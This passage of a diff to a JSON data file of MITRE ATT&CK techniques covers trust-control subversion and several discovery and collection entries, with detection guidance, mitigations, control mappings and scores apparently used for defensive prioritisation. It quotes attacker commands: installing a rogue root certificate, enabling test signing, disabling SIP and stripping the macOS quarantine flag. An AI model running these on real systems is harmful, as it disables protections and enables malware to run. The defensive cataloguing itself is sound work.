communications.(Citation: Kaspersky Superfish)\n\nRoot certificates (and their associated chains) can also be cloned and reinstalled. Cloned certificate chains will carry many of the same metadata characteristics of the source and can be used to sign malicious code that may then bypass signature validation tools (ex: Sysinternals, antivirus, etc.) used to block execution and/or uncover artifacts of Persistence.(Citation: SpectorOps Code Signing Dec 2017)\n\nIn macOS, the Ay MaMi malware uses /usr/bin/security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain /path/to/malicious/cert to install a malicious certificate as a trusted root certificate into the system keychain.(Citation: objective-see ay mami 2018)",
+                "detection": "A system's root certificates are unlikely to change frequently. Monitor new certificates installed on a system that could be due to malicious activity.(Citation: SpectorOps Code Signing Dec 2017) Check pre-installed certificates on new systems to ensure unnecessary or suspicious certificates are not present. Microsoft provides a list of trustworthy root certificates online and through authroot.stl.(Citation: SpectorOps Code Signing Dec 2017) The Sysinternals Sigcheck utility can also be used (sigcheck[64].exe -tuv) to dump the contents of the certificate store and list valid certificates not rooted to the Microsoft Certificate Trust List.(Citation: Microsoft Sigcheck May 2017)\n\nInstalled root certificates are located in the Registry under HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Root\\Certificates\\ and [HKLM or HKCU]\\Software[\\Policies\\]\\Microsoft\\SystemCertificates\\Root\\Certificates\\. There are a subset of root certificates that are consistent across Windows systems and can be used for comparison:(Citation: Tripwire AppUNBlocker)\n\n* 18F7C1FCC3090203FD5BAA2F861A754976C8DD25\n* 245C97DF7514E7CF2DF8BE72AE957B9E04741E85\n* 3B1EFD3A66EA28B16697394703A72CA340A05BD5\n* 7F88CD7223F3C813818C994614A89C99FA3B5247\n* 8F43288AD272F3103B6FB1428485EA3014C0BCFE\n* A43489159A520F0D93D032CCAF37E7FE20A8B419\n* BE36A4562FB2EE05DBB3D32323ADF445084ED656\n* CDD4EEAE6000AC7F40C3802C171E30148030C072",
+                "mitigations": [
+                    {
+                        "mid": "M1028",
+                        "name": "Operating System Configuration",
+                        "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.",
+                        "url": "https://attack.mitre.org/mitigations/M1028"
+                    },
+                    {
+                        "mid": "M1054",
+                        "name": "Software Configuration",
+                        "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.",
+                        "url": "https://attack.mitre.org/mitigations/M1054"
+                    }
+                ]
+            },
+            {
+                "tid": "T1553.005",
+                "name": "Subvert Trust Controls: Mark-of-the-Web Bypass",
+                "url": "https://attack.mitre.org/techniques/T1553/005",
+                "description": "Adversaries may abuse specific file formats to subvert Mark-of-the-Web (MOTW) controls. In Windows, when files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.(Citation: Microsoft Zone.Identifier 2020) Files that are tagged with MOTW are protected and cannot perform certain actions. For example, starting in MS Office 10, if a MS Office file has the MOTW, it will open in Protected View. Executables tagged with the MOTW will be processed by Windows Defender SmartScreen that compares files with an allowlist of well-known executables. If the file in not known/trusted, SmartScreen will prevent the execution and warn the user not to run it.(Citation: Beek Use of VHD Dec 2020)(Citation: Outflank MotW 2020)(Citation: Intezer Russian APT Dec 2020)\n\nAdversaries may abuse container files such as compressed/archive (.arj, .gzip) and/or disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW. Container files downloaded from the Internet will be marked with MOTW but the files within may not inherit the MOTW after the container files are extracted and/or mounted. MOTW is a NTFS feature and many container files do not support NTFS alternative data streams. After a container file is extracted and/or mounted, the files contained within them may be treated as local files on disk and run without protections.(Citation: Beek Use of VHD Dec 2020)(Citation: Outflank MotW 2020)",
+                "detection": "Monitor compressed/archive and image files downloaded from the Internet as the contents may not be tagged with the MOTW. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities.",
+                "mitigations": [
+                    {
+                        "mid": "M1038",
+                        "name": "Execution Prevention",
+                        "description": "Block execution of code on a system through application control, and/or script blocking.",
+                        "url": "https://attack.mitre.org/mitigations/M1038"
+                    }
+                ]
+            },
+            {
+                "tid": "T1553.006",
+                "name": "Subvert Trust Controls: Code Signing Policy Modification",
+                "url": "https://attack.mitre.org/techniques/T1553/006",
+                "description": "Adversaries may modify code signing policies to enable execution of unsigned or self-signed code. Code signing provides a level of authenticity on a program from a developer and a guarantee that the program has not been tampered with. Security controls can include enforcement mechanisms to ensure that only valid, signed code can be run on an operating system. \n\nSome of these security controls may be enabled by default, such as Driver Signature Enforcement (DSE) on Windows or System Integrity Protection (SIP) on macOS.(Citation: Microsoft DSE June 2017)(Citation: Apple Disable SIP) Other such controls may be disabled by default but are configurable through application controls, such as only allowing signed Dynamic-Link Libraries (DLLs) to execute on a system. Since it can be useful for developers to modify default signature enforcement policies during the development and testing of applications, disabling of these features may be possible with elevated permissions.(Citation: Microsoft Unsigned Driver Apr 2017)(Citation: Apple Disable SIP)\n\nAdversaries may modify code signing policies in a number of ways, including through use of command-line or GUI utilities, [Modify Registry](https://attack.mitre.org/techniques/T1112), rebooting the computer in a debug/recovery mode, or by altering the value of variables in kernel memory.(Citation: Microsoft TESTSIGNING Feb 2021)(Citation: Apple Disable SIP)(Citation: FireEye HIKIT Rootkit Part 2)(Citation: GitHub Turla Driver Loader) Examples of commands that can modify the code signing policy of a system include bcdedit.exe -set TESTSIGNING ON on Windows and csrutil disable on macOS.(Citation: Microsoft TESTSIGNING Feb 2021)(Citation: Apple Disable SIP) Depending on the implementation, successful modification of a signing policy may require reboot of the compromised system. Additionally, some implementations can introduce visible artifacts for the user (ex: a watermark in the corner of the screen stating the system is in Test Mode). Adversaries may attempt to remove such artifacts.(Citation: F-Secure BlackEnergy 2014)\n\nTo gain access to kernel memory to modify variables related to signature checks, such as modifying g_CiOptions to disable Driver Signature Enforcement, adversaries may conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) using a signed, but vulnerable driver.(Citation: Unit42 AcidBox June 2020)(Citation: GitHub Turla Driver Loader)",
+                "detection": "Monitor processes and command-line arguments for actions that could be taken to modify the code signing policy of a system, such as bcdedit.exe -set TESTSIGNING ON.(Citation: Microsoft TESTSIGNING Feb 2021) Consider monitoring for modifications made to Registry keys associated with code signing policies, such as HKCU\\Software\\Policies\\Microsoft\\Windows NT\\Driver Signing. Modifications to the code signing policy of a system are likely to be rare.",
+                "mitigations": [
+                    {
+                        "mid": "M1046",
+                        "name": "Boot Integrity",
+                        "description": "Use secure methods to boot a system and verify the integrity of the operating system and loading mechanisms.",
+                        "url": "https://attack.mitre.org/mitigations/M1046"
+                    },
+                    {
+                        "mid": "M1026",
+                        "name": "Privileged Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                        "url": "https://attack.mitre.org/mitigations/M1026"
+                    },
+                    {
+                        "mid": "M1024",
+                        "name": "Restrict Registry Permissions",
+                        "description": "Restrict the ability to modify certain hives or keys in the Windows Registry.",
+                        "url": "https://attack.mitre.org/mitigations/M1024"
+                    }
+                ]
+            }
+        ],
         "mitigations": [
             {
-                "mid": "M1041",
-                "name": "Encrypt Sensitive Information",
-                "description": "Protect sensitive information with strong encryption.",
-                "url": "https://attack.mitre.org/mitigations/M1041"
+                "mid": "M1038",
+                "name": "Execution Prevention",
+                "description": "Block execution of code on a system through application control, and/or script blocking.",
+                "url": "https://attack.mitre.org/mitigations/M1038"
             },
             {
-                "mid": "M1029",
-                "name": "Remote Data Storage",
-                "description": "Use remote security log and sensitive file storage where access can be controlled better to prevent exposure of intrusion detection log data or sensitive information.",
-                "url": "https://attack.mitre.org/mitigations/M1029"
+                "mid": "M1028",
+                "name": "Operating System Configuration",
+                "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1028"
+            },
+            {
+                "mid": "M1024",
+                "name": "Restrict Registry Permissions",
+                "description": "Restrict the ability to modify certain hives or keys in the Windows Registry.",
+                "url": "https://attack.mitre.org/mitigations/M1024"
+            },
+            {
+                "mid": "M1054",
+                "name": "Software Configuration",
+                "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.",
+                "url": "https://attack.mitre.org/mitigations/M1054"
             }
         ],
-        "cumulative_score": 0.3203063442857143,
-        "adjusted_score": 0.3203063442857143,
+        "cumulative_score": 0.3822572228571429,
+        "adjusted_score": 0.3822572228571429,
         "has_car": false,
         "has_sigma": true,
         "has_es_siem": false,
         "has_splunk": false,
         "cis_controls": [
-            "3.11",
-            "11.4",
-            "12.8"
+            "2.5",
+            "2.6",
+            "4.1",
+            "4.8",
+            "18.3",
+            "18.5"
         ],
         "nist_controls": [
-            "AC-16",
-            "AC-17",
-            "AC-18",
-            "AC-19",
-            "AC-20",
+            "AC-6",
+            "CA-8",
+            "CM-10",
             "CM-2",
+            "CM-3",
+            "CM-5",
             "CM-6",
+            "CM-7",
             "CM-8",
-            "CP-6",
-            "CP-7",
-            "CP-9",
-            "SC-36",
-            "SC-4",
-            "SI-12",
-            "SI-23",
+            "IA-7",
+            "IA-9",
+            "RA-9",
+            "SA-10",
+            "SA-11",
+            "SC-34",
+            "SI-10",
+            "SI-2",
             "SI-4",
             "SI-7"
         ],
@@ -6662,291 +29822,252 @@
         "cloud_coverage": false,
         "hardware_coverage": false,
         "actionability_score": {
-            "combined_score": 0.2142857142857143,
-            "mitigation_score": 0.36363636363636365,
-            "detection_score": 0.05
+            "combined_score": 0.24285714285714288,
+            "mitigation_score": 0.45454545454545453,
+            "detection_score": 0.01
         },
         "choke_point_score": 0.1,
-        "prevalence_score": 0.00602063
+        "prevalence_score": 0.03940008
     },
     {
-        "tid": "T1120",
-        "name": "Peripheral Device Discovery",
-        "description": "Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.",
-        "url": "https://attack.mitre.org/techniques/T1120",
+        "tid": "T1553.001",
+        "name": "Subvert Trust Controls: Gatekeeper Bypass",
+        "description": "Adversaries may modify file attributes that signify programs are from untrusted sources to subvert Gatekeeper controls in macOS. When documents, applications, or programs are downloaded an extended attribute (xattr) called com.apple.quarantine can be set on the file by the application performing the download. This attribute, also known as a quarantine flag, is read by Apple's Gatekeeper defense program when the file is run and provides a prompt to the user to allow or deny execution. Gatekeeper also monitors an application's usage of dynamic libraries (dylibs) loaded outside the application folder on any quarantined binary, often using the dlopen function. If the quarantine flag is set in macOS 10.15+, Gatekeeper also checks for a notarization ticket and sends a cryptographic hash to Apple's servers to check for validity for all unsigned executables.(Citation: TheEclecticLightCompany apple notarization )(Citation: Bypassing Gatekeeper)\n\nThe quarantine flag is an opt-in system and not imposed by macOS. If an application opts-in, a file downloaded from the Internet will be given a quarantine flag before being saved to disk. Any application or user with write permissions to the file can change or strip the quarantine flag. With elevated permission (sudo), this attribute can be removed from any file. The presence of the com.apple.quarantine quarantine flag can be checked with the xattr command xattr -l /path/to/examplefile. Similarly, this attribute can be recursively removed from all files in a folder using xattr, sudo xattr -d com.apple.quarantine /path/to/folder.(Citation: 20 macOS Common Tools and Techniques)(Citation: TheEclecticLightCompany Quarantine and the flag)(Citation: theevilbit gatekeeper bypass 2021)\n\nApps and files loaded onto the system from a USB flash drive, optical disk, external hard drive, from a drive shared over the local network, or using the curl command do not set this flag. Additionally, it is possible to avoid setting this flag using [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), which may bypass Gatekeeper. (Citation: Methods of Mac Malware Persistence)(Citation: Clearing quarantine attribute)(Citation: OceanLotus for OS X)",
+        "url": "https://attack.mitre.org/techniques/T1553/001",
         "tactics": [
-            "Discovery"
+            "Defense Evasion"
         ],
-        "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
+        "detection": "The removal of the com.apple.quarantine flag by a user instead of the operating system is a suspicious action and should be examined further. Monitor and investigate attempts to modify extended file attributes with utilities such as xattr. Built-in system utilities may generate high false positive alerts, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible. Monitor software update frameworks that strip the com.apple.quarantine flag when performing updates. \n\nReview false values under the LSFileQuarantineEnabled entry in an application's Info.plist file (required by every application). false under LSFileQuarantineEnabled indicates that an application does not use the quarantine flag. Unsandboxed applications with an unspecified LSFileQuarantineEnabled entry will default to not setting the quarantine flag. \n\nQuarantineEvents is a SQLite database containing a list of all files assigned the com.apple.quarantine attribute, located at ~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2. Each event contains the corresponding UUID, timestamp, application, Gatekeeper score, and decision if it was allowed.(Citation: TheEclecticLightCompany Quarantine and the flag)",
         "platforms": [
-            "Windows",
             "macOS"
         ],
         "data_sources": [
             "Command: Command Execution",
-            "Process: OS API Execution",
+            "File: File Metadata",
+            "File: File Modification",
             "Process: Process Creation"
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
+        "is_subtechnique": true,
+        "supertechnique": "T1553",
         "subtechniques": [],
-        "mitigations": [],
-        "cumulative_score": 0.11826443428571429,
-        "adjusted_score": 0.11826443428571429,
+        "mitigations": [
+            {
+                "mid": "M1038",
+                "name": "Execution Prevention",
+                "description": "Block execution of code on a system through application control, and/or script blocking.",
+                "url": "https://attack.mitre.org/mitigations/M1038"
+            }
+        ],
+        "cumulative_score": 0.17619047619047618,
+        "adjusted_score": 0.17619047619047618,
         "has_car": false,
         "has_sigma": true,
         "has_es_siem": true,
         "has_splunk": false,
-        "cis_controls": [],
-        "nist_controls": [],
+        "cis_controls": [
+            "2.5"
+        ],
+        "nist_controls": [
+            "CM-2",
+            "CM-6",
+            "CM-7",
+            "SI-10",
+            "SI-4",
+            "SI-7"
+        ],
         "process_coverage": true,
         "network_coverage": false,
-        "file_coverage": false,
+        "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.014285714285714284,
-            "detection_score": 0.03
-        },
-        "choke_point_score": 0.1,
-        "prevalence_score": 0.00397872
+        "hardware_coverage": false
     },
     {
-        "tid": "T1123",
-        "name": "Audio Capture",
-        "description": "An adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information.\n\nMalware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture audio. Audio files may be written to disk and exfiltrated later.",
-        "url": "https://attack.mitre.org/techniques/T1123",
+        "tid": "T1553.002",
+        "name": "Subvert Trust Controls: Code Signing",
+        "description": "Adversaries may create, acquire, or steal code signing materials to sign their malware or tools. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. (Citation: Wikipedia Code Signing) The certificates used during an operation may be created, acquired, or stolen by the adversary. (Citation: Securelist Digital Certificates) (Citation: Symantec Digital Certificates) Unlike [Invalid Code Signature](https://attack.mitre.org/techniques/T1036/001), this activity will result in a valid signature.\n\nCode signing to verify software on first run can be used on modern Windows and macOS/OS X systems. It is not used on Linux due to the decentralized nature of the platform. (Citation: Wikipedia Code Signing) \n\nCode signing certificates may be used to bypass security policies that require signed code to execute on a system. ",
+        "url": "https://attack.mitre.org/techniques/T1553/002",
         "tactics": [
-            "Collection"
+            "Defense Evasion"
         ],
-        "detection": "Detection of this technique may be difficult due to the various APIs that may be used. Telemetry data regarding API use may not be useful depending on how a system is normally used, but may provide context to other potentially malicious activity occurring on a system.\n\nBehavior that could indicate technique use include an unknown or unusual process accessing APIs associated with devices or software that interact with the microphone, recording devices, or recording software, and a process periodically writing files to disk that contain audio data.",
+        "detection": "Collect and analyze signing certificate metadata on software that executes within the environment to look for unusual certificate characteristics and outliers.",
         "platforms": [
-            "Linux",
             "Windows",
             "macOS"
         ],
         "data_sources": [
-            "Command: Command Execution",
-            "Process: OS API Execution"
+            "File: File Metadata"
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
+        "is_subtechnique": true,
+        "supertechnique": "T1553",
         "subtechniques": [],
         "mitigations": [],
-        "cumulative_score": 0.13333333333333333,
-        "adjusted_score": 0.13333333333333333,
+        "cumulative_score": 0.10952380952380952,
+        "adjusted_score": 0.10952380952380952,
         "has_car": false,
         "has_sigma": true,
         "has_es_siem": true,
         "has_splunk": false,
         "cis_controls": [],
         "nist_controls": [],
-        "process_coverage": true,
+        "process_coverage": false,
         "network_coverage": false,
-        "file_coverage": false,
+        "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.03333333333333333,
-            "detection_score": 0.07
-        },
-        "choke_point_score": 0.1,
-        "prevalence_score": 0
+        "hardware_coverage": false
     },
     {
-        "tid": "T1124",
-        "name": "System Time Discovery",
-        "description": "An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network. (Citation: MSDN System Time) (Citation: Technet Windows Time Service)\n\nSystem time information may be gathered in a number of ways, such as with [Net](https://attack.mitre.org/software/S0039) on Windows by performing net time \\\\hostname to gather the system time on a remote system. The victim's time zone may also be inferred from the current system time or gathered by using w32tm /tz. (Citation: Technet Windows Time Service)\n\nThis information could be useful for performing other techniques, such as executing a file with a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053) (Citation: RSA EU12 They're Inside), or to discover locality information based on time zone to assist in victim targeting (i.e. [System Location Discovery](https://attack.mitre.org/techniques/T1614)). Adversaries may also use knowledge of system time as part of a time bomb, or delaying execution until a specified date/time.(Citation: AnyRun TimeBomb)",
-        "url": "https://attack.mitre.org/techniques/T1124",
+        "tid": "T1553.003",
+        "name": "Subvert Trust Controls: SIP and Trust Provider Hijacking",
+        "description": "Adversaries may tamper with SIP and trust provider components to mislead the operating system and application control tools when conducting signature validation checks. In user mode, Windows Authenticode (Citation: Microsoft Authenticode) digital signatures are used to verify a file's origin and integrity, variables that may be used to establish trust in signed code (ex: a driver with a valid Microsoft signature may be handled as safe). The signature validation process is handled via the WinVerifyTrust application programming interface (API) function,  (Citation: Microsoft WinVerifyTrust) which accepts an inquiry and coordinates with the appropriate trust provider, which is responsible for validating parameters of a signature. (Citation: SpectorOps Subverting Trust Sept 2017)\n\nBecause of the varying executable file types and corresponding signature formats, Microsoft created software components called Subject Interface Packages (SIPs) (Citation: EduardosBlog SIPs July 2008) to provide a layer of abstraction between API functions and files. SIPs are responsible for enabling API functions to create, retrieve, calculate, and verify signatures. Unique SIPs exist for most file formats (Executable, PowerShell, Installer, etc., with catalog signing providing a catch-all  (Citation: Microsoft Catalog Files and Signatures April 2017)) and are identified by globally unique identifiers (GUIDs). (Citation: SpectorOps Subverting Trust Sept 2017)\n\nSimilar to [Code Signing](https://attack.mitre.org/techniques/T1553/002), adversaries may abuse this architecture to subvert trust controls and bypass security policies that allow only legitimately signed code to execute on a system. Adversaries may hijack SIP and trust provider components to mislead operating system and application control tools to classify malicious (or any) code as signed by: (Citation: SpectorOps Subverting Trust Sept 2017)\n\n* Modifying the Dll and FuncName Registry values in HKLM\\SOFTWARE[\\WOW6432Node\\]Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllGetSignedDataMsg\\{SIP_GUID} that point to the dynamic link library (DLL) providing a SIP’s CryptSIPDllGetSignedDataMsg function, which retrieves an encoded digital certificate from a signed file. By pointing to a maliciously-crafted DLL with an exported function that always returns a known good signature value (ex: a Microsoft signature for Portable Executables) rather than the file’s real signature, an adversary can apply an acceptable signature value to all files using that SIP (Citation: GitHub SIP POC Sept 2017) (although a hash mismatch will likely occur, invalidating the signature, since the hash returned by the function will not match the value computed from the file).\n* Modifying the Dll and FuncName Registry values in HKLM\\SOFTWARE\\[WOW6432Node\\]Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllVerifyIndirectData\\{SIP_GUID} that point to the DLL providing a SIP’s CryptSIPDllVerifyIndirectData function, which validates a file’s computed hash against the signed hash value. By pointing to a maliciously-crafted DLL with an exported function that always returns TRUE (indicating that the validation was successful), an adversary can successfully validate any file (with a legitimate signature) using that SIP (Citation: GitHub SIP POC Sept 2017) (with or without hijacking the previously mentioned CryptSIPDllGetSignedDataMsg function). This Registry value could also be redirected to a suitable exported function from an already present DLL, avoiding the requirement to drop and execute a new file on disk.\n* Modifying the DLL and Function Registry values in HKLM\\SOFTWARE\\[WOW6432Node\\]Microsoft\\Cryptography\\Providers\\Trust\\FinalPolicy\\{trust provider GUID} that point to the DLL providing a trust provider’s FinalPolicy function, which is where the decoded and parsed signature is checked and the majority of trust decisions are made. Similar to hijacking SIP’s CryptSIPDllVerifyIndirectData function, this value can be redirected to a suitable exported function from an already present DLL or a maliciously-crafted DLL (though the implementation of a trust provider is complex).\n* **Note:** The above hijacks are also possible without modifying the Registry via [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).\n\nHijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation. (Citation: SpectorOps Subverting Trust Sept 2017)",
+        "url": "https://attack.mitre.org/techniques/T1553/003",
         "tactics": [
-            "Discovery"
+            "Defense Evasion"
         ],
-        "detection": "Command-line interface monitoring may be useful to detect instances of net.exe or other command-line utilities being used to gather system time or time zone. Methods of detecting API use for gathering this information are likely less useful due to how often they may be used by legitimate software.",
+        "detection": "Periodically baseline registered SIPs and trust providers (Registry entries and files on disk), specifically looking for new, modified, or non-Microsoft entries. (Citation: SpectorOps Subverting Trust Sept 2017)\n\nEnable CryptoAPI v2 (CAPI) event logging (Citation: Entrust Enable CAPI2 Aug 2017) to monitor and analyze error events related to failed trust validation (Event ID 81, though this event can be subverted by hijacked trust provider components) as well as any other provided information events (ex: successful validations). Code Integrity event logging may also provide valuable indicators of malicious SIP or trust provider loads, since protected processes that attempt to load a maliciously-crafted trust validation component will likely fail (Event ID 3033). (Citation: SpectorOps Subverting Trust Sept 2017)\n\nUtilize Sysmon detection rules and/or enable the Registry (Global Object Access Auditing) (Citation: Microsoft Registry Auditing Aug 2016) setting in the Advanced Security Audit policy to apply a global system access control list (SACL) and event auditing on modifications to Registry values (sub)keys related to SIPs and trust providers: (Citation: Microsoft Audit Registry July 2012)\n\n* HKLM\\SOFTWARE\\Microsoft\\Cryptography\\OID\n* HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\OID\n* HKLM\\SOFTWARE\\Microsoft\\Cryptography\\Providers\\Trust\n* HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\Providers\\Trust\n\n**Note:** As part of this technique, adversaries may attempt to manually edit these Registry keys (ex: Regedit) or utilize the legitimate registration process using [Regsvr32](https://attack.mitre.org/techniques/T1218/010). (Citation: SpectorOps Subverting Trust Sept 2017)\n\nAnalyze Autoruns data for oddities and anomalies, specifically malicious files attempting persistent execution by hiding within auto-starting locations. Autoruns will hide entries signed by Microsoft or Windows by default, so ensure “Hide Microsoft Entries” and “Hide Windows Entries” are both deselected. (Citation: SpectorOps Subverting Trust Sept 2017)",
         "platforms": [
             "Windows"
         ],
         "data_sources": [
-            "Command: Command Execution",
-            "Process: OS API Execution",
-            "Process: Process Creation"
+            "File: File Modification",
+            "Module: Module Load",
+            "Windows Registry: Windows Registry Key Modification"
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
+        "is_subtechnique": true,
+        "supertechnique": "T1553",
         "subtechniques": [],
-        "mitigations": [],
-        "cumulative_score": 0.11904761904761905,
-        "adjusted_score": 0.11904761904761905,
-        "has_car": false,
+        "mitigations": [
+            {
+                "mid": "M1038",
+                "name": "Execution Prevention",
+                "description": "Block execution of code on a system through application control, and/or script blocking.",
+                "url": "https://attack.mitre.org/mitigations/M1038"
+            },
+            {
+                "mid": "M1022",
+                "name": "Restrict File and Directory Permissions",
+                "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1022"
+            },
+            {
+                "mid": "M1024",
+                "name": "Restrict Registry Permissions",
+                "description": "Restrict the ability to modify certain hives or keys in the Windows Registry.",
+                "url": "https://attack.mitre.org/mitigations/M1024"
+            }
+        ],
+        "cumulative_score": 0.30000000000000004,
+        "adjusted_score": 0.30000000000000004,
+        "has_car": true,
         "has_sigma": true,
-        "has_es_siem": false,
+        "has_es_siem": true,
         "has_splunk": true,
-        "cis_controls": [],
-        "nist_controls": [],
-        "process_coverage": true,
-        "network_coverage": false,
-        "file_coverage": false,
-        "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.019047619047619046,
-            "detection_score": 0.04
-        },
-        "choke_point_score": 0.1,
-        "prevalence_score": 0
-    },
-    {
-        "tid": "T1125",
-        "name": "Video Capture",
-        "description": "An adversary can leverage a computer's peripheral devices (e.g., integrated cameras or webcams) or applications (e.g., video call services) to capture video recordings for the purpose of gathering information. Images may also be captured from devices or applications, potentially in specified intervals, in lieu of video files.\n\nMalware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture video or images. Video or image files may be written to disk and exfiltrated later. This technique differs from [Screen Capture](https://attack.mitre.org/techniques/T1113) due to use of specific devices or applications for video recording rather than capturing the victim's screen.\n\nIn macOS, there are a few different malware samples that record the user's webcam such as FruitFly and Proton. (Citation: objective-see 2017 review)",
-        "url": "https://attack.mitre.org/techniques/T1125",
-        "tactics": [
-            "Collection"
-        ],
-        "detection": "Detection of this technique may be difficult due to the various APIs that may be used. Telemetry data regarding API use may not be useful depending on how a system is normally used, but may provide context to other potentially malicious activity occurring on a system.\n\nBehavior that could indicate technique use include an unknown or unusual process accessing APIs associated with devices or software that interact with the video camera, recording devices, or recording software, and a process periodically writing files to disk that contain video or camera image data.",
-        "platforms": [
-            "Windows",
-            "macOS"
+        "cis_controls": [
+            "2.6",
+            "3.3",
+            "4.1",
+            "6.1",
+            "6.2",
+            "6.8"
         ],
-        "data_sources": [
-            "Command: Command Execution",
-            "Process: OS API Execution"
+        "nist_controls": [
+            "AC-3",
+            "AC-6",
+            "CA-7",
+            "CM-2",
+            "CM-6",
+            "CM-7",
+            "SI-10",
+            "SI-3",
+            "SI-4",
+            "SI-7"
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
-        "subtechniques": [],
-        "mitigations": [],
-        "cumulative_score": 0.10476190476190476,
-        "adjusted_score": 0.10476190476190476,
-        "has_car": false,
-        "has_sigma": true,
-        "has_es_siem": false,
-        "has_splunk": false,
-        "cis_controls": [],
-        "nist_controls": [],
         "process_coverage": true,
         "network_coverage": false,
-        "file_coverage": false,
+        "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.0047619047619047615,
-            "detection_score": 0.01
-        },
-        "choke_point_score": 0.1,
-        "prevalence_score": 0
+        "hardware_coverage": false
     },
     {
-        "tid": "T1127",
-        "name": "Trusted Developer Utilities Proxy Execution",
-        "description": "Adversaries may take advantage of trusted developer utilities to proxy execution of malicious payloads. There are many utilities used for software development related tasks that can be used to execute code in various forms to assist in development, debugging, and reverse engineering.(Citation: engima0x3 DNX Bypass)(Citation: engima0x3 RCSI Bypass)(Citation: Exploit Monday WinDbg)(Citation: LOLBAS Tracker) These utilities may often be signed with legitimate certificates that allow them to execute on a system and proxy execution of malicious code through a trusted process that effectively bypasses application control solutions.",
-        "url": "https://attack.mitre.org/techniques/T1127",
+        "tid": "T1553.004",
+        "name": "Subvert Trust Controls: Install Root Certificate",
+        "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.(Citation: Wikipedia Root Certificate) Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.\n\nInstallation of a root certificate on a compromised system would give an adversary a way to degrade the security of that system. Adversaries have used this technique to avoid security warnings prompting users when compromised systems connect over HTTPS to adversary controlled web servers that spoof legitimate websites in order to collect login credentials.(Citation: Operation Emmental)\n\nAtypical root certificates have also been pre-installed on systems by the manufacturer or in the software supply chain and were used in conjunction with malware/adware to provide [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) capability for intercepting information transmitted over secure TLS/SSL communications.(Citation: Kaspersky Superfish)\n\nRoot certificates (and their associated chains) can also be cloned and reinstalled. Cloned certificate chains will carry many of the same metadata characteristics of the source and can be used to sign malicious code that may then bypass signature validation tools (ex: Sysinternals, antivirus, etc.) used to block execution and/or uncover artifacts of Persistence.(Citation: SpectorOps Code Signing Dec 2017)\n\nIn macOS, the Ay MaMi malware uses /usr/bin/security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain /path/to/malicious/cert to install a malicious certificate as a trusted root certificate into the system keychain.(Citation: objective-see ay mami 2018)",
+        "url": "https://attack.mitre.org/techniques/T1553/004",
         "tactics": [
             "Defense Evasion"
         ],
